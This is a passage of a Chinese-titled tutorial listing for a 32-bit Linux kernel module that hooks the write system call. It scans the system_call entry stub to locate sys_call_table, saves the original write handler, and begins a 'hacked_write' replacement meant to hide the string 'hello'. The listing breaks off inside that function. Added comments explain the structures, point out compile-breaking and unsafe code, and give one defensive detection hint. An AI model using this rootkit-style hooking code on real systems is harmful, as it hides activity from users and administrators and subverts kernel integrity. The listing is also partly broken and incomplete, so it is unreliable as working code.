Linux内核Hook系统调用

1,截获write系统调用:

#ifndef MODULE
#define MODULE
#endif
                                                                             
#ifndef __KERNEL__
#define __KERNEL__
#endif
#include <linux/init.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/slab.h>
/*
#include <sys/types.h>
#include <asm/fcntl.h>
#include <linux/malloc.h>
#include <linux/types.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <asm/errno.h>
#include <sys/syscall.h>
*/
MODULE_LICENSE("GPL");
/*
 * Minimal view of one 8-byte IDT gate descriptor (32-bit x86). Only the two
 * halves of the handler offset are named; the middle words (in the x86 gate
 * layout the segment selector and the type/attribute bits) are not used by
 * the code in this listing.
 */
struct descriptor_idt
{
        unsigned short offset_low;      /* handler offset, bits 0..15 */
        unsigned short ignore1;
        unsigned short ignore2;
        unsigned short offset_high;     /* handler offset, bits 16..31 */
};
/*
 * Image of the IDTR register: 16-bit limit followed by the linear base.
 * Packed so the two fields are adjacent (6 bytes on a 32-bit kernel, where
 * unsigned long is 4 bytes); presumably filled by `sidt` in code that is not
 * part of this listing.
 */
static struct {
        unsigned short limit;
        unsigned long base;
}__attribute__ ((packed)) idt48;

static unsigned int SYS_CALL_TABLE_ADDR;        /* not referenced by the visible code */
void **sys_call_table;                          /* resolved table pointer; assigned elsewhere */
/* address of the system_call entry stub scanned by get_sys_call_table();
 * carried in a plain int, so this only holds on 32-bit x86 — set elsewhere */
int base_system_call;
/* saved pointer to the original write handler; presumably the hook forwards
 * to it and the unload path restores it (neither is visible here) */
int (*orig_write)(unsigned int fd,char *buf,unsigned int count);
/* first three bytes of the i386 "call *disp32(,%eax,4)" encoding
 * (opcode 0xff /2, SIB 0x85); the 32-bit table address follows them */
unsigned char opcode_call[3]={0xff,0x14,0x85};
/*
 * Test whether the three bytes at `source` equal the opcode_call pattern.
 *
 * Returns 1 when all three bytes match, 0 at the first mismatch. The caller
 * must guarantee that at least three bytes are readable at `source`.
 */
int match(unsigned char *source)
{
        const unsigned char *expected = opcode_call;
        const unsigned char *end = opcode_call + 3;

        while (expected != end) {
                if (*source++ != *expected++)
                        return 0;
        }
        return 1;
}
/*
 * Locate sys_call_table by scanning the first 100 bytes of the system_call
 * entry stub (at base_system_call) for the "call *sys_call_table(,%eax,4)"
 * instruction — the bytes in opcode_call followed by a 32-bit absolute
 * displacement — and returning that displacement.
 *
 * Assumes base_system_call has already been set (not shown in this listing;
 * presumably derived from the IDT entry for the int 0x80 gate) and a 32-bit
 * x86 kernel: addresses travel in int/unsigned int and the opcode pattern
 * is specific to the i386 entry code.
 *
 * Returns the table address on success, or -1 when no match is found in the
 * window. The sentinel is in-band: a caller cannot tell -1 apart from a
 * table located at 0xFFFFFFFF.
 *
 * Defender's note: this signature scan is the classic way syscall-table
 * hooking modules find the table; comparing the table's entries against the
 * kernel's known symbol addresses detects the hook installed with it.
 */
int get_sys_call_table(void)
{
        int i,j;        /* j is declared but never used */
        unsigned char *ins=(unsigned char *)base_system_call;
        unsigned int sct;
                                                                             
        for(i=0;i<100;i++){
                if(ins[i]==opcode_call[0]){
                        if(match(ins+i)){
                                /* Unaligned, type-punned read of the 32-bit
                                 * displacement after the 3 opcode bytes
                                 * (strict-aliasing/alignment hazard; memcpy
                                 * would be the clean form). Can also read a
                                 * few bytes beyond the 100-byte window when
                                 * the match sits at its very end. */
                                sct=*((unsigned int *)(ins+3+i));
                                /* NOTE: the string literal below is wrapped
                                 * across two lines in this listing and will
                                 * not compile as printed. */
                                printk(KERN_ALERT "sys_call_tabl's address is
0x%X\n",sct);
                                return sct;
                        }
                }
        }
                                                                             
        printk(KERN_ALERT "can't find the address of sys_call_table\n");
        return -1;
}
int hacked_write(unsigned int fd,char *buf,unsigned int count)
{
 char *hide="hello";
